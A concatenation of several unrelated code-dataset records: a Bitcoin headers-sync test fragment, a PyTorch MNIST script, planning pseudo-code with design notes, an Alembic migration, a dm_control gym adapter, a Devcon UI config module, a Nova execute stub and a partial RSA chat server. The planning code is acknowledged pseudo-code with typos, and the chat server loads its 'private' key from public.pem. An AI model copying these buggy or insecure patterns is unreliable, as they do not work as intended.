assert_equal(int(self.nodes[0].getbestblockhash(), 16), blocks[1].sha256)
blocks = []
# Now we test that if we repeatedly don't send connecting headers, we
# don't go into an infinite loop trying to get them to connect.
MAX_UNCONNECTING_HEADERS = 10
for j in range(MAX_UNCONNECTING_HEADERS + 1):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].nVersion = 0x20000000
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
for i in range(1, MAX_UNCONNECTING_HEADERS):
# Send a header that doesn't connect, check that we get a getheaders.
with mininode_lock:
test_node.last_message.pop("getheaders", None)
test_node.send_header_for_blocks([blocks[i]])
test_node.wait_for_getheaders()
# Next header will connect, should re-set our count:
test_node.send_header_for_blocks([blocks[0]])
# Remove the first two entries (blocks[1] would connect):
blocks = blocks[2:]
# Now try to see how many unconnecting headers we can send
# before we get disconnected. Should be 5*MAX_UNCONNECTING_HEADERS
for i in range(5 * MAX_UNCONNECTING_HEADERS - 1):
# Send a header that doesn't connect, check that we get a getheaders.
with mininode_lock:
test_node.last_message.pop("getheaders", None)
test_node.send_header_for_blocks([blocks[i % len(blocks)]])
test_node.wait_for_getheaders()
# Eventually this stops working.
test_node.send_header_for_blocks([blocks[-1]])
# Should get disconnected
test_node.wait_for_disconnect()
self.log.info("Part 5: success!")
# Finally, check that the inv node never received a getdata request,
# throughout the test
assert "getdata" not in inv_node.last_message
if __name__ == '__main__':
SendHeadersTest().main()
|
the-stack_106_22080
|
import torch
import torch.nn as nn
import numpy as np
from torchsummary import summary
from torchvision import datasets
import torchvision.transforms as transforms
import torch.nn.functional as F
from extract_layers import extract_layers
from visualize_net import nnVisual, NetVisual
from manim.utils.file_ops import open_file
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(1, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(784, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
#x = self.pool(F.relu(self.conv1(x)))
#x = self.pool(F.relu(self.conv2(x)))
#x = x.view(-1, 16 * 4 * 4)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return F.log_softmax(x, dim=1)
# number of subprocesses to use for data loading
num_workers = 0
# how many samples per batch to load
batch_size = 20
# convert data to torch.FloatTensor
transform = transforms.ToTensor()
# choose the training and test datasets
train_data = datasets.MNIST(root='data', train=True,
download=True, transform=transform)
test_data = datasets.MNIST(root='data', train=False,
download=True, transform=transform)
# prepare data loaders
train_loader = torch.utils.data.DataLoader(train_data, batch_size=batch_size,
num_workers=num_workers)
test_loader = torch.utils.data.DataLoader(test_data, batch_size=batch_size,
num_workers=num_workers)
# L
net = Net()
viz_net = NetVisual(net, [784], device=torch.device("cpu"))
viz = nnVisual(viz_net)
layers_dict = viz_net.layers_dict
#viz.render()
#open_file("./media/videos/1080p60/nnVisual.mp4")
## Specify loss and optimization functions
# specify loss function
criterion = nn.CrossEntropyLoss()
# specify optimizer
optimizer = torch.optim.SGD(net.parameters(), lr=0.01)
# number of epochs to train the model
n_epochs = 30 # suggest training between 20-50 epochs
net.train() # prep model for training
for epoch in range(n_epochs):
# monitor training loss
train_loss = 0.0
###################
# train the model #
###################
for data, target in train_loader:
# clear the gradients of all optimized variables
optimizer.zero_grad()
data_flat = torch.flatten(data, start_dim=1)
# forward pass: compute predicted outputs by passing inputs to the model
output = net(data_flat)
# calculate the loss
loss = criterion(output, target)
# backward pass: compute gradient of the loss with respect to model parameters
loss.backward()
# perform a single optimization step (parameter update)
optimizer.step()
# update running training loss
train_loss += loss.item()*data_flat.size(0)
viz_net.update_layers_dict(data_flat)
# print training statistics
# calculate average loss over an epoch
train_loss = train_loss/len(train_loader.dataset)
print(net.parameters())
print(viz_net.layers_dict["Linear-0"]["weights"])
print('Epoch: {} \tTraining Loss: {:.6f}'.format(
epoch+1,
train_loss
))
|
the-stack_106_22081
|
import random
# Ok, I think what we have below is correct as pseudo-code.
# Next: test it with a simple environment and make it no-longer pseudo-code
# After that: make it into a persistent thing that I can make multiple calls to.
'''
A snag:
I need some way of figuring out whether a node has already been explored. Currently these nodes can be anything. Ideally they would be something hashable so I can put them in a set or a dictionary, or even just use them as edge coordinates without using the more cumbersome integer ids to stand in for them in the set of edges.
Options:
1. Follow through: make the nodes be hashable and just do this.
2. Make an additional function (which must be passed in) that returns a unique id that can be used... but this is basically just the hash function.
What I'm going to do for now:
Follow through, make everything be hashable (can go in a set, etc.) then revise if that becomes unfeasible later.
'''
'''
A few thoughts:
There are two components here:
One thing that grows this graph and another thing that tries to find a path through that graph from start to goal. Both need similar, but slightly different structures. The graph can be shared for all time (i.e. by multiple calls to plan for the same target configuration). The path finder is specific to the start and goal.
The basic idea is to grow the graph until you can find a path through it from the start to the goal that is "good enough." How do you know when to check if you have a path from start to goal? At the moment, it seems like you can do this every time you make a connection back to the graph. But there's a better thing here I think. If you keep track of what nodes are reachable from the current start, then you can only check once you hit a previously unreachable node. That's not bad.
'''
'''
Another issue (perhaps for later):
Also, how do I do the backward search that lets me avoid camera motion? Right now this is all forward.
'''
'''
Tangles:
What is the interface that I want to provide to the gentle user of this function for any reasonable version of this?
So first off, we need an env.
My idea from earlier this morning is that each component should provide get_state and set_state (which should return an observation) methods that allow us to jump around to different states and do backtracking, etc. The combined state is then a good thing to use as a node indentifier.
My idea from later this evening was to impose some kind of structure on this whole thing and use the fact that we are always adding or removing bricks that correspond to some target. In that way, each state would bastically be a bit-vector for whether or not a certain target node has a corresponding node in the scene, and then another bit vector if we want to allow non-target nodes to show up when an agent makes mistakes. This is nice because we have a nice distance metric to use here when planning (hamming distance).
The problem with the first thing is that it makes it hard to use certain nice heuristics, like assembly via disassembly.
The problem with the second thing is it's more limited and doesn't have variables for things like camera motion. So out the window it goes maybe?
The problem with throwing it out is that this assembly via disassembly is probably pretty powerful, and without it, it will take a lot more work to make sure we don't move the camera too much.
The second problem with it though is that we now have to figure out a way to translate whatever our different state space is to this bit vector, which becomes something we either have to make as some super-generic component of the env (which doesn't really make sense, because the env can cover spaces that don't have a specific target) or make that conversion another thing the user has to specify. What are we to do?
So conceptually, it would be really nice to be able to use whatever configuration space we want, but doing so gets rid of some powerful heuristics.
So what else must the user provide? Honestly, it would be nice if the answer was "a start, a goal and not much else." But then I realize that I have these functions that I've been treating as arguments: neighbor_fn and check_edge_fn. These are two new things that must be supplied by the gentle user, and they are not trivial at all. In the case of the reassembly planner, the neighbor_fn is:
def neighbor_fn(env, state, target):
obs = env.set_state(state)
current_instances = get_instances_from_obs()
match(current_instances, target)
if misplaced_current_instances:
return remove_ops_for_misplaced_current_instances
elif unplaced_target_instances:
return add_ops_for_target_graph_neighbors
else:
return []
But here we find another tangle: if our state space is this convoluted thing we get directly from the environment, how do we know what the neighbors will be or what high level actions we can reason about? I mean, yeah I guess we can just hard-code it, and make our gentle user specify it in whatever implments remove_ops_for_misplaced_current_instances. This gets back to the fact that somebody real, either us or gentle user is going to need to do some transating from goofy complicated state space output by the environment to clean precise hashable node that can be added to a python set or dictionary and tested for equality with other nodes.
What to do what to do?
Is there a different route to take? Lookng further afield, we could go to the bit-vector approach, and make everything else (cameras) part of the transition space between nodes. The problem with this is that we'd then have to track this as we trace a path through high-level nodes.
What if we just tried to plan directly in the super-crazy-pants space? Skip the high-level/low-level thing and just do all planning in the low-level space. This seems pretty hard though. Maybe possible with crazy heuristics? I mean that's kind of what my last attempt was/is right? And that has been kind of a disaster. Why? There's still some business to clear up there about viewpoints and other things. What a mess.
Ok, so how can we make the high-level/low-level search work? And make it general enough to use for multiple action spaces? This thing really is about adding and removing nodes, so maybe we do the bit-vector thing with a... no no no. We need the camera in there too. So the neighbor function is going to return camera motions as well? Yikes. Is this where some heuristic comes in to compensate for the blow-up in graph degree? Guess so.
We're also going to need something that can get us from point a to point b using low-level actions. I guess we know how to do this, the last few attempts at this all do something similar, but the last few attempts have also been all this crazy specific mess. I guess this is kind of fine if it gets me there, BUT I thought cleaning up that mess was part of what this attempt was all about, and it's kind of disappointing to throw away generality again (or require the gentle user to implement so so much).
As a thought exercise, let's pull this together from the bottom up. At the lowest level, our action space is all the pixels in the screen plus a dozen or so extra levers.
From here we can consolidate all the pixels into a varying number of discrete regions that all do the same thing. This takes us from ~256x256 to probably a few hundred discrete snap points. A few hundred is still really big. We could reduce this still if we group those few hundred into a slightly smaller functionally equivalent class, where all the snaps that result in the same next pose get grouped together. This may help a little bit, but not as much as we need. Is this getting us anywhere?
One thought: we can make the low-level planner be another instantiation of the high-level planner. Fancy fancy. In this case, the check_edge function would do nothing because all the edges are already correctly connected to each other. Would be kinda cool if it worked.
Ok no more tangles.
'''
'''
High Level:
env: gym environment
nodes: states
edges: lazily evaluated low-level state-action-state paths
neighbor_fn: [manually specified] add-remove bricks plus camera actions
check_edge_fn: low-level planner
Low Level:
env: gym environment (shared with high-level)
nodes: states
edges: actions
neighbor_fn:
Yo wait wait wait... what if we added a new action space that us find high-level neighbors automatically based on the target. Yeah I like that a lot. This is only in the training environment, so the agent can't actually use it, but it can be used for supervision. We could even do this for the low-level environment too. The purpose of it is just to specify the structure of the graph for planning at that particular level. We could even make this some levels deeper by making the low-level planner operate in symbolic snap space and defer that plan to a low-low-level (basement-level) planner that picks out pixel coordinates and shit. Eew man, that's nasty. Maybe good nasty. Maybe bad nasty. Won't know until the morning.
How does all this make the planning more general and easy to use?
Oh one more thing, if we do the center-viewport-to-snap thing I've been mulling over in my head, then the number of camera actions are really big yo. This is kind of similar to the issues I'm having with everything else though. It seems like I need a special heuristic kind of thing to tell me which ones of these to consider.
'''
'''
There is another argument to make here: just forget all this fancy general nonsense and make one thing that works for reassembly. Oof. Just fuggin do it, you know? Is this the right thing? Don't mull it over. Lay it out. Let's start laying this out, enough meandering.
'''
class GraphSearch:
def __init__(self, road_map):
self.road_map = road_map
class RoadMap:
def __init__(
self,
env,
neighbor_fn,
check_edge_fn,
):
self.env = env
self.nodes = set()
self.edges = {}
# TODO: make these members, and make the user subclass RoadMap?
self.neighbor_fn = neighbor_fn
self.check_edge_fn = check_edge_fn
def plan(self, start, goal, max_cost=float('inf')):
while True:
path, cost = self.graph_search(start, goal, max_cost=max_cost)
if path is not None:
return path, cost
new_nodes = self.expand_graph()
if not new_nodes:
raise Exception
def graph_search(self, start, goal, max_cost=max_cost):
precursors = {}
frontier = [(0,start)]
def plan(
env,
start,
goal,
neighbor_fn,
check_edge_fn,
max_cost=float('inf'),
):
nodes = {goal}
edges = {}
# initialize the frontier
frontier = [(None, start)]
reachable_nodes = {start}
def pick_from_frontier():
connected_edges = [
(a,b) for (a,b) in frontier if b in nodes]
if connected_edges:
return random.choice(connected_eges)
else:
return random.choice(frontier)
while frontier:
source, destination = pick_from_frontier()
nodes.add(destination)
if source is not None:
edges[source, destination] = float('inf'), None
if destination not in reachable_nodes:
path_steps = []
path_cost = 0.
# this should be an in-place A* update or something
path = graph_search(start, goal, nodes, edges)
for s, d in path:
edge_cost, edge_steps = edges[s,d]
if edge_steps is None:
cost, steps = check_edge_fn(env, s, d)
edge[s, d] = cost, steps
path_steps.extend(steps)
path_cost += cost
if path_cost >= max_cost:
break
reachable_nodes.add(d)
else:
return path_steps, path_cost
neighbors = neighbor_fn(env, dest)
for neighbor in neighbors:
frontier.append((dest, neighbor))
# if we can't find anything, return an empty sequence with infinite cost
return [], float('inf')
def test_plan():
'''
d
x \
b---c
\ x
a
'''
nodes = set('abcd')
start = 'a'
goal = 'b'
def neighbor_fn(env, node):
if node == 'a':
return 'b', 'c'
elif node == 'b':
return 'c', 'd'
elif node == 'c':
return 'b', 'd'
elif node == 'd':
return ()
def check_fn(env, s, d):
if s == 'a' and d == 'b':
return 0., ['ab.1', 'ab.2']
elif s == 'a' and d == 'c':
return float('inf'), []
elif s == 'b' and d == 'd':
return float('inf'), []
elif s == 'b' and d == 'c':
return 0., ['bc.1', 'bc.2']
elif s == 'c' and d == 'b':
return 0., ['cb.1', 'cb.2']
elif s == 'c' and d == 'd':
return 0., ['cd.1', 'cd.2']
plan(None, 'a', 'b', neighbor_fn, check_fn)
if __name__ == '__main__':
test_plan()
|
the-stack_106_22082
|
"""empty message
Revision ID: ee2b22119072
Revises:
Create Date: 2018-04-16 21:19:27.273617
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'ee2b22119072'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('user',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('access_token', sa.String(length=128), nullable=True),
sa.Column('first_name', sa.String(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('rule',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('lat', sa.Float(), nullable=True),
sa.Column('lng', sa.Float(), nullable=True),
sa.Column('address', sa.String(), nullable=True),
sa.Column('time', sa.DateTime(), nullable=True),
sa.Column('append_date', sa.Boolean(), nullable=True),
sa.Column('activity_name', sa.String(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('rule')
op.drop_table('user')
# ### end Alembic commands ###
|
the-stack_106_22083
|
"""Implements an adapter for DeepMind Control Suite environments."""
from collections import OrderedDict
import copy
import numpy as np
from dm_control import suite
from dm_control.rl.specs import ArraySpec, BoundedArraySpec
from dm_control.suite.wrappers import pixels
from gym import spaces
from .softlearning_env import SoftlearningEnv
DM_CONTROL_ENVIRONMENTS = {}
def convert_dm_control_to_gym_space(dm_control_space):
"""Recursively convert dm_control_space into gym space.
Note: Need to check the following cases of the input type, in the following
order:
(1) BoundedArraySpec
(2) ArraySpec
(3) OrderedDict.
- Generally, dm_control observation_specs are OrderedDict with other spaces
(e.g. ArraySpec) nested in it.
- Generally, dm_control action_specs are of type `BoundedArraySpec`.
To handle dm_control observation_specs as inputs, we check the following
input types in order to enable recursive calling on each nested item.
"""
if isinstance(dm_control_space, BoundedArraySpec):
gym_box = spaces.Box(
low=dm_control_space.minimum,
high=dm_control_space.maximum,
shape=None,
dtype=dm_control_space.dtype)
# Note: `gym.Box` doesn't allow both shape and min/max to be defined
# at the same time. Thus we omit shape in the constructor and verify
# that it's been implicitly set correctly.
assert gym_box.shape == dm_control_space.shape, (
(gym_box.shape, dm_control_space.shape))
return gym_box
elif isinstance(dm_control_space, ArraySpec):
if isinstance(dm_control_space, BoundedArraySpec):
raise ValueError("The order of the if-statements matters.")
return spaces.Box(
low=-float("inf"),
high=float("inf"),
shape=dm_control_space.shape,
dtype=dm_control_space.dtype)
elif isinstance(dm_control_space, OrderedDict):
return spaces.Dict(OrderedDict([
(key, convert_dm_control_to_gym_space(value))
for key, value in dm_control_space.items()
]))
else:
raise ValueError(dm_control_space)
class DmControlAdapter(SoftlearningEnv):
"""Adapter between SoftlearningEnv and DeepMind Control Suite."""
def __init__(self,
domain,
task,
*args,
env=None,
normalize=True,
observation_keys=(),
goal_keys=(),
unwrap_time_limit=True,
pixel_wrapper_kwargs=None,
**kwargs):
assert not args, (
"Gym environments don't support args. Use kwargs instead.")
self.normalize = normalize
self.unwrap_time_limit = unwrap_time_limit
super(DmControlAdapter, self).__init__(
domain, task, *args, goal_keys=goal_keys, **kwargs)
if env is None:
assert (domain is not None and task is not None), (domain, task)
env = suite.load(
domain_name=domain,
task_name=task,
task_kwargs=kwargs
# TODO: Figure out how to pass kwargs to this guy.
# Need to split into `task_kwargs`, `environment_kwargs`, and
# `visualize_reward` bool. Check the suite.load(.) in:
# https://github.com/deepmind/dm_control/blob/master/dm_control/suite/__init__.py
)
self._env_kwargs = kwargs
else:
assert not kwargs
assert domain is None and task is None, (domain, task)
# Ensure action space is already normalized.
if normalize:
np.testing.assert_equal(env.action_spec().minimum, -1)
np.testing.assert_equal(env.action_spec().maximum, 1)
if pixel_wrapper_kwargs is not None:
env = pixels.Wrapper(env, **pixel_wrapper_kwargs)
self._env = env
assert isinstance(env.observation_spec(), OrderedDict)
self.observation_keys = (
observation_keys or tuple(env.observation_spec().keys()))
observation_space = convert_dm_control_to_gym_space(
env.observation_spec())
self._observation_space = type(observation_space)([
(name, copy.deepcopy(space))
for name, space in observation_space.spaces.items()
if name in self.observation_keys + self.goal_keys
])
action_space = convert_dm_control_to_gym_space(self._env.action_spec())
if len(action_space.shape) > 1:
raise NotImplementedError(
"Shape of the action space ({}) is not flat, make sure to"
" check the implemenation.".format(action_space))
self._action_space = action_space
def step(self, action, *args, **kwargs):
time_step = self._env.step(action, *args, **kwargs)
reward = time_step.reward
terminal = time_step.last()
info = {
key: value
for key, value in time_step.observation.items()
if key not in self.observation_keys
}
observation = self._filter_observation(time_step.observation)
time_step._replace(observation=observation)
return observation, reward, terminal, info
def reset(self, *args, **kwargs):
time_step = self._env.reset(*args, **kwargs)
observation = self._filter_observation(time_step.observation)
time_step._replace(observation=observation)
return time_step.observation
def render(self, *args, mode="human", camera_id=0, **kwargs):
if mode == "human":
raise NotImplementedError(
"TODO: Figure out how to not continuously launch"
" viewers if one is already open."
" See: https://github.com/deepmind/dm_control/issues/39.")
elif mode == "rgb_array":
return self._env.physics.render(
*args, camera_id=camera_id, **kwargs)
raise NotImplementedError(mode)
def seed(self, *args, **kwargs):
return self._env.seed(*args, **kwargs)
@property
def unwrapped(self):
return self._env
|
the-stack_106_22084
|
"""Support for the Devcon UI."""
from functools import wraps
import logging
import os
import time
import voluptuous as vol
from openpeerpower.components import websocket_api
from openpeerpower.exceptions import OpenPeerPowerError
from openpeerpower.util.yaml import load_yaml
_LOGGER = logging.getLogger(__name__)
DOMAIN = "devcon"
STORAGE_KEY = DOMAIN
STORAGE_VERSION = 1
CONF_MODE = "mode"
MODE_YAML = "yaml"
MODE_STORAGE = "storage"
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Optional(CONF_MODE, default=MODE_STORAGE): vol.All(
vol.Lower, vol.In([MODE_YAML, MODE_STORAGE])
)
}
)
},
extra=vol.ALLOW_EXTRA,
)
EVENT_LOVELACE_UPDATED = "devcon_updated"
LOVELACE_CONFIG_FILE = "ui-devcon.yaml"
class ConfigNotFound(OpenPeerPowerError):
"""When no config available."""
async def async_setup(opp, config):
"""Set up the Devcon commands."""
# Pass in default to `get` because defaults not set if loaded as dep
mode = config.get(DOMAIN, {}).get(CONF_MODE, MODE_STORAGE)
opp.components.frontend.async_register_built_in_panel(DOMAIN, config={"mode": mode})
if mode == MODE_YAML:
opp.data[DOMAIN] = DevconYAML(opp)
else:
opp.data[DOMAIN] = DevconStorage(opp)
opp.components.websocket_api.async_register_command(websocket_devcon_config)
opp.components.websocket_api.async_register_command(websocket_devcon_save_config)
opp.components.websocket_api.async_register_command(websocket_devcon_delete_config)
opp.components.system_health.async_register_info(DOMAIN, system_health_info)
return True
class DevconStorage:
"""Class to handle Storage based Devcon config."""
def __init__(self, opp):
"""Initialize Devcon config based on storage helper."""
self._store = opp.helpers.storage.Store(STORAGE_VERSION, STORAGE_KEY)
self._data = None
self._opp = opp
async def async_get_info(self):
"""Return the YAML storage mode."""
if self._data is None:
await self._load()
if self._data["config"] is None:
return {"mode": "auto-gen"}
return _config_info("storage", self._data["config"])
async def async_load(self, force):
"""Load config."""
if self._opp.config.safe_mode:
raise ConfigNotFound
if self._data is None:
await self._load()
config = self._data["config"]
if config is None:
raise ConfigNotFound
return config
async def async_save(self, config):
"""Save config."""
if self._data is None:
await self._load()
self._data["config"] = config
self._opp.bus.async_fire(EVENT_LOVELACE_UPDATED)
await self._store.async_save(self._data)
async def async_delete(self):
"""Delete config."""
await self.async_save(None)
async def _load(self):
"""Load the config."""
data = await self._store.async_load()
self._data = data if data else {"config": None}
class DevconYAML:
"""Class to handle YAML-based Devcon config."""
def __init__(self, opp):
"""Initialize the YAML config."""
self.opp = opp
self._cache = None
async def async_get_info(self):
"""Return the YAML storage mode."""
try:
config = await self.async_load(False)
except ConfigNotFound:
return {
"mode": "yaml",
"error": "{} not found".format(
self.opp.config.path(LOVELACE_CONFIG_FILE)
),
}
return _config_info("yaml", config)
async def async_load(self, force):
"""Load config."""
is_updated, config = await self.opp.async_add_executor_job(
self._load_config, force
)
if is_updated:
self.opp.bus.async_fire(EVENT_LOVELACE_UPDATED)
return config
def _load_config(self, force):
"""Load the actual config."""
fname = self.opp.config.path(LOVELACE_CONFIG_FILE)
# Check for a cached version of the config
if not force and self._cache is not None:
config, last_update = self._cache
modtime = os.path.getmtime(fname)
if config and last_update > modtime:
return False, config
is_updated = self._cache is not None
try:
config = load_yaml(fname)
except FileNotFoundError:
raise ConfigNotFound from None
self._cache = (config, time.time())
return is_updated, config
async def async_save(self, config):
"""Save config."""
raise OpenPeerPowerError("Not supported")
async def async_delete(self):
"""Delete config."""
raise OpenPeerPowerError("Not supported")
def handle_yaml_errors(func):
"""Handle error with WebSocket calls."""
@wraps(func)
async def send_with_error_handling(opp, connection, msg):
error = None
try:
result = await func(opp, connection, msg)
except ConfigNotFound:
error = "config_not_found", "No config found."
except OpenPeerPowerError as err:
error = "error", str(err)
if error is not None:
connection.send_error(msg["id"], *error)
return
if msg is not None:
await connection.send_big_result(msg["id"], result)
else:
connection.send_result(msg["id"], result)
return send_with_error_handling
@websocket_api.async_response
@websocket_api.websocket_command(
{"type": "devcon/config", vol.Optional("force", default=False): bool}
)
@handle_yaml_errors
async def websocket_devcon_config(opp, connection, msg):
"""Send Devcon UI config over WebSocket configuration."""
return await opp.data[DOMAIN].async_load(msg["force"])
@websocket_api.async_response
@websocket_api.websocket_command(
{"type": "devcon/config/save", "config": vol.Any(str, dict)}
)
@handle_yaml_errors
async def websocket_devcon_save_config(opp, connection, msg):
"""Save Devcon UI configuration."""
await opp.data[DOMAIN].async_save(msg["config"])
@websocket_api.async_response
@websocket_api.websocket_command({"type": "devcon/config/delete"})
@handle_yaml_errors
async def websocket_devcon_delete_config(opp, connection, msg):
"""Delete Devcon UI configuration."""
await opp.data[DOMAIN].async_delete()
async def system_health_info(opp):
"""Get info for the info page."""
return await opp.data[DOMAIN].async_get_info()
def _config_info(mode, config):
"""Generate info about the config."""
return {
"mode": mode,
"resources": len(config.get("resources", [])),
"views": len(config.get("views", [])),
}
|
the-stack_106_22085
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2011 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""This modules stubs out functions in openstack.common.processutils."""
import re
from eventlet import greenthread
from nova.openstack.common import log as logging
from nova.openstack.common import processutils
LOG = logging.getLogger(__name__)
_fake_execute_repliers = []
_fake_execute_log = []
def fake_execute_get_log():
return _fake_execute_log
def fake_execute_clear_log():
global _fake_execute_log
_fake_execute_log = []
def fake_execute_set_repliers(repliers):
"""Allows the client to configure replies to commands."""
global _fake_execute_repliers
_fake_execute_repliers = repliers
def fake_execute_default_reply_handler(*ignore_args, **ignore_kwargs):
"""A reply handler for commands that haven't been added to the reply list.
Returns empty strings for stdout and stderr.
"""
return '', ''
def fake_execute(*cmd_parts, **kwargs):
"""This function stubs out execute.
It optionally executes a preconfigued function to return expected data.
"""
global _fake_execute_repliers
process_input = kwargs.get('process_input', None)
check_exit_code = kwargs.get('check_exit_code', 0)
delay_on_retry = kwargs.get('delay_on_retry', True)
attempts = kwargs.get('attempts', 1)
run_as_root = kwargs.get('run_as_root', False)
cmd_str = ' '.join(str(part) for part in cmd_parts)
LOG.debug(_("Faking execution of cmd (subprocess): %s"), cmd_str)
_fake_execute_log.append(cmd_str)
reply_handler = fake_execute_default_reply_handler
for fake_replier in _fake_execute_repliers:
if re.match(fake_replier[0], cmd_str):
reply_handler = fake_replier[1]
LOG.debug(_('Faked command matched %s') % fake_replier[0])
break
if isinstance(reply_handler, basestring):
# If the reply handler is a string, return it as stdout
reply = reply_handler, ''
else:
try:
# Alternative is a function, so call it
reply = reply_handler(cmd_parts,
process_input=process_input,
delay_on_retry=delay_on_retry,
attempts=attempts,
run_as_root=run_as_root,
check_exit_code=check_exit_code)
except processutils.ProcessExecutionError as e:
LOG.debug(_('Faked command raised an exception %s'), e)
raise
stdout = reply[0]
stderr = reply[1]
LOG.debug(_("Reply to faked command is stdout='%(stdout)s' "
"stderr='%(stderr)s'") % locals())
# Replicate the sleep call in the real function
greenthread.sleep(0)
return reply
def stub_out_processutils_execute(stubs):
fake_execute_set_repliers([])
fake_execute_clear_log()
stubs.Set(processutils, 'execute', fake_execute)
|
the-stack_106_22087
|
import socket
import pickle
import threading
import sys
import argparse
import os
from datetime import datetime
from message import Message, EnhancedJSONEncoder
from streaming import createMsg, streamData
import json
from Crypto.Cipher import PKCS1_OAEP # RSA based cipher using Optimal Asymmetric Encryption Padding
from Crypto.PublicKey import RSA # to generate the keys
class RSAEncryption:
def __init__(self, bits):
self.BITS = bits
def generatePrivateKey(self):
self.private_key = RSA.generate(self.BITS)
def generatePublicKey(self):
self.public_key = self.private_key.publickey()
def writeToFile(self):
private_pem = self.private_key.exportKey().decode("utf-8")
public_pem = self.public_key.exportKey().decode("utf-8")
with open('./keys/private.pem', 'w+') as private:
private.write(private_pem)
with open('./keys/public.pem', 'w+') as private:
private.write(public_pem)
def importKeys(self):
keys = []
pr_key = RSA.importKey(open('./keys/public.pem', 'r').read())
pu_key = RSA.importKey(open('./keys/public.pem', 'r').read())
keys.append(pr_key)
keys.append(pu_key)
return keys
class Server:
def __init__(self, ip, port, buffer_size):
self.IP = ip
self.PORT = port
self.BUFFER_SIZE = buffer_size
self.USERNAME = "server"
self.temp_f = False
self.connections = []
self.database = {
"host" : "username"
}
self.command_list = {
"[export_chat]" : "export current chat",
"[help]" : "display possibile commands"
}
self.users_log = "./logs/users.txt"
self.chat_log = "./logs/chatlog.txt"
self.cons_log = "./logs/cons.txt"
self.current_chat = "./logs/currentchat.txt"
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# # encryption
# self.enc = RSAEncryption(1024)
# self.enc.generatePrivateKey()
# self.enc.generatePublicKey()
# self.enc.writeToFile()
# self.keys = self.enc.importKeys()
# self.cipher = PKCS1_OAEP.new(key = self.keys[0])
def startServer(self):
try:
self.server.bind((self.IP, self.PORT))
except socket.error as e:
print(str(e))
self.server.listen(10)
'''
#Load in previously created usernames
try:
usersFile = open("./logs/users.txt", "r")
except IOError as e:
print(str(e))
users = usersFile.readlines()
#loop through file, and no including empty lines, strip the line break escape char and add username to database
for user in users[1:]:
if(user != "\n"):
self.database.update({"offline": user.replace("\n", "")})
#just print out the usernames line by line
print(f"pre-existing users: ")
for account in self.database.values():
if(account != "username"):
print(account)
'''
print(f"[*] Starting server ({self.IP}) on port {self.PORT}")
def acceptConnections(self):
while True:
client_socket, address = self.server.accept()
print(f"[*] Connection from {address} has been established!")
self.logConnections(address[0])
cThread = threading.Thread(target = self.handler, args = (client_socket, address))
cThread.daemon = True
cThread.start()
self.connections.append(client_socket)
# self.sharePubKey(client_socket)
# def sharePubKey(self, client_socket):
# with open("./keys/public.pem", 'rb') as f:
# key = createMsg(pickle.dumps(f.read()))
# client_socket.send(key)
# print("*** Public Key sent ***")
def logConnections(self, address):
contime = datetime.now()
with open(self.cons_log, "a") as cons:
cons.write(address + ">" + str(contime) + '\n')
def logUsers(self, data):
with open(self.users_log, "a", encoding = "utf-8") as users:
users.write(data + '\n')
def logChat(self, data):
timestamp = datetime.now()
with open(self.chat_log, "a", encoding = "utf-8") as chatlog:
chatlog.write(data + " " + str(timestamp) + '\n')
def current(self, data):
""" wasn't sure about using with here """
self.currentchat = open(self.current_chat, "a+", encoding = "utf-8")
self.currentchat.write(data + '\n')
def checkUsername(self, client_socket, address, data):
flag = False
decoded_content = data["cont"]
# decrypted_data = self.cipher.decrypt(data).decode("utf-8")
for user in self.database:
if self.database[user] == decoded_content:
flag = True
self.temp_f = True
content = "[*] Username already in use!"
# encrypted_content = self.cipher.encrypt(content)
warning = Message(self.IP, address, self.USERNAME, str(datetime.now()), content, 'username_taken')
client_socket.send(warning.pack().encode("utf-8"))
break
if flag == False:
self.database.update( {address : decoded_content} )
self.logUsers(decoded_content)
content = "[*] You have joined the chat!"
# encrypted_content = self.cipher.encrypt(content)
joined = Message(self.IP, address, self.USERNAME, str(datetime.now()), content, 'approved_conn')
client_socket.send(joined.pack().encode("utf-8"))
def exportChat(self, client_socket, address):
with open(self.current_chat, "rb") as chat:
content = chat.read()
packet = Message(self.IP, address, self.USERNAME, str(datetime.now()), content, 'export')
for connection in self.connections:
if connection == client_socket:
connection.send(packet.pack())
print("[*] Sent!")
def commandList(self, client_socket):
cdict = createMsg(pickle.dumps(self.command_list)) # manually crafting since i can't call pack() -> not a message obj
for connection in self.connections:
if connection == client_socket:
connection.send(cdict)
print("[*] Sent!")
def closeConnection(self, client_socket, address):
disconnected_msg = f"[{address[0]}] has left the chat"
left_msg_obj = Message(self.IP, "allhosts", self.USERNAME, str(datetime.now), disconnected_msg, 'default')
left_msg = left_msg_obj.pack()
self.connections.remove(client_socket)
for connection in self.connections:
connection.send(left_msg.encode("utf-8"))
if not self.connections:
try:
os.remove(self.current_chat)
except FileNotFoundError:
print("*** Nothing to clear in the logs")
try:
del self.database[address]
